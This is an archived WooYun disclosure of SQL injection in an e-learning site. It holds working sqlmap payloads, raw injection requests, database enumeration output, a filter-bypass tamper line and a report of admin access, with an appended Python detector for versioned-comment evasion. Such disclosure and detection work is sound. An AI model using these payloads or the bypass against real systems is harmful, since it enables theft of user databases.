WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
2015-01-22: Details have been reported to the vendor and are awaiting processing
2015-01-23: Vendor has confirmed; details disclosed to the vendor only
2015-02-02: Details disclosed to core white hats and relevant domain experts
2015-02-12: Details disclosed to regular white hats
2015-02-22: Details disclosed to intern white hats
2015-03-08: Details disclosed to the public
http://elearning.100e.com/lvword/AddToMyLib.asp?LetterLevel=0&PageNo=6&WordLevel=
Two POST-type injection points:

POST /lvword/ApplyAdd.asp HTTP/1.1
Content-Length: 182
Content-Type: application/x-www-form-urlencoded
Referer: http://elearning.100e.com/
Cookie: ASPSESSIONIDCARRTSAD=CCNPACLCANHADHOLLBHMDLCG
Host: elearning.100e.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

Slct_WordID=%5c&Slct_WordID=1038&Slct_WordID=1923&Slct_WordID=1739&Slct_WordID=1738&Slct_WordID=1690&Slct_WordID=2043&Slct_WordID=1679&Slct_WordID=1619&Slct_WordID=999&User=100eGuest

-------------

POST /lvWord/ApplyDel.asp HTTP/1.1
Content-Length: 25
Content-Type: application/x-www-form-urlencoded
Referer: http://elearning.100e.com/
Cookie: ASPSESSIONIDCARRTSAD=CCNPACLCANHADHOLLBHMDLCG
Host: elearning.100e.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

Delete=%5c&user=100eGuest
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: WordLevel
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: LetterLevel=0&PageNo=6&WordLevel=-9134' OR (1585=1585)#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: LetterLevel=0&PageNo=6&WordLevel=' AND (SELECT 4947 FROM(SELECT COUNT(*),CONCAT(0x7165746571,(SELECT (CASE WHEN (4947=4947) THEN 1 ELSE 0 END)),0x71787a6d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZeHm'='ZeHm

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: LetterLevel=0&PageNo=6&WordLevel=' UNION ALL SELECT NULL,CONCAT(0x7165746571,0x41765065585877547578,0x71787a6d71),NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: LetterLevel=0&PageNo=6&WordLevel=' AND 7649=BENCHMARK(5000000,MD5(0x77536462)) AND 'dqTB'='dqTB
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL 5.0
available databases [26]:
[*] 100eDB
[*] 100eDB2
[*] 100eZone
[*] Admin
[*] AppendDB
[*] Book
[*] Chat7
[*] Chat7_Log
[*] Client
[*] ClientLog
[*] Course
[*] Edu
[*] FileService
[*] Group
[*] information_schema
[*] IPLocation
[*] mysql
[*] School
[*] Tag
[*] TEC
[*] TemporaryDB
[*] test
[*] User
[*] VC2008
[*] VC6
[*] VC7

The leaked information includes users, affiliated users, and third-party information. Looking at mymember:

select count(*) from mymember: '262 6446'

2.62 million user records. Dumping the other tables worked normally, but when dumping the mymember table the connection was refused; clearly a pre-insertion check is in place, but...

payload = "%s /*!30%s%s*/%s" % (payload[:payload.find(' ')], randomInt(3), payload[payload.find(' ') + 1:], postfix)

bypassed it successfully... After getting admin access, I found that the admin accounts have different permissions. Here is a screenshot:
1. I suggest checking the whole site; there are quite a few problems. 2. Asking for 20 rank!!!
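Added example, not part of the report: the pre-insertion check the author ran into was evidently defeated by wrapping the payload in a MySQL versioned comment, whose body MySQL executes while a raw-text filter sees only a comment. The Python below models such a keyword check (the actual filter in front of the 100e database is unknown, so the patterns are an assumption built from the sqlmap output above) and shows that it only holds up once request parameters are normalized the way the MySQL parser reads them. Parameterized queries in the ASP pages remain the real fix; this is a detection-side control.

```python
import re

# MySQL executes the body of a "versioned" comment /*!NNNNN body */ whenever
# its own version is >= NNNNN (a bare /*! body */ always executes). A filter
# that inspects the raw parameter sees a comment; the server runs live SQL.
# MySQL reads at most six digits as the version prefix.
VERSION_COMMENT = re.compile(r"/\*!\d{0,6}(.*?)\*/", re.DOTALL)
PLAIN_COMMENT = re.compile(r"/\*(?!!).*?\*/", re.DOTALL)

# Assumed blocklist, built from the injection types sqlmap reported above
# (UNION, error-based via INFORMATION_SCHEMA, heavy-query BENCHMARK).
SUSPICIOUS = [
    re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    re.compile(r"\binformation_schema\b", re.I),
    re.compile(r"\bbenchmark\s*\(", re.I),
]

def normalize(value):
    """Rewrite a parameter so it reads the way the MySQL parser will see it."""
    prev = None
    while prev != value:                                # until no comments remain
        prev = value
        value = VERSION_COMMENT.sub(r" \1 ", value)     # keep the executable body
        value = PLAIN_COMMENT.sub(" ", value)           # drop inert comments
    return re.sub(r"\s+", " ", value).strip()

def naive_check(value):
    """Raw-text match: what a filter that ignores comment syntax does."""
    return any(p.search(value) for p in SUSPICIOUS)

def hardened_check(value):
    """Same patterns, applied after comment normalization."""
    return naive_check(normalize(value))

def flag_params(params):
    """Return the names of request parameters that fail the hardened check."""
    return [name for name, value in params.items() if hardened_check(value)]

# Constructed samples: the UNION payload from the report, and the same payload
# wrapped in a versioned comment following the shape of the report's tamper
# ("<first token> /*!30<3 digits><rest>*/").
RAW = "' UNION ALL SELECT NULL,CONCAT(0x7165746571,0x41765065585877547578,0x71787a6d71),NULL,NULL,NULL#"
TAMPERED = "' /*!30456UNION ALL SELECT NULL,CONCAT(0x7165746571,0x41765065585877547578,0x71787a6d71),NULL,NULL,NULL*/#"

if __name__ == "__main__":
    print(naive_check(TAMPERED), hardened_check(TAMPERED))
    print(flag_params({"LetterLevel": "0", "PageNo": "6", "WordLevel": TAMPERED}))
```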
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-01-23 10:07
Thanks, fixing it right away.
2015-01-23: Fixed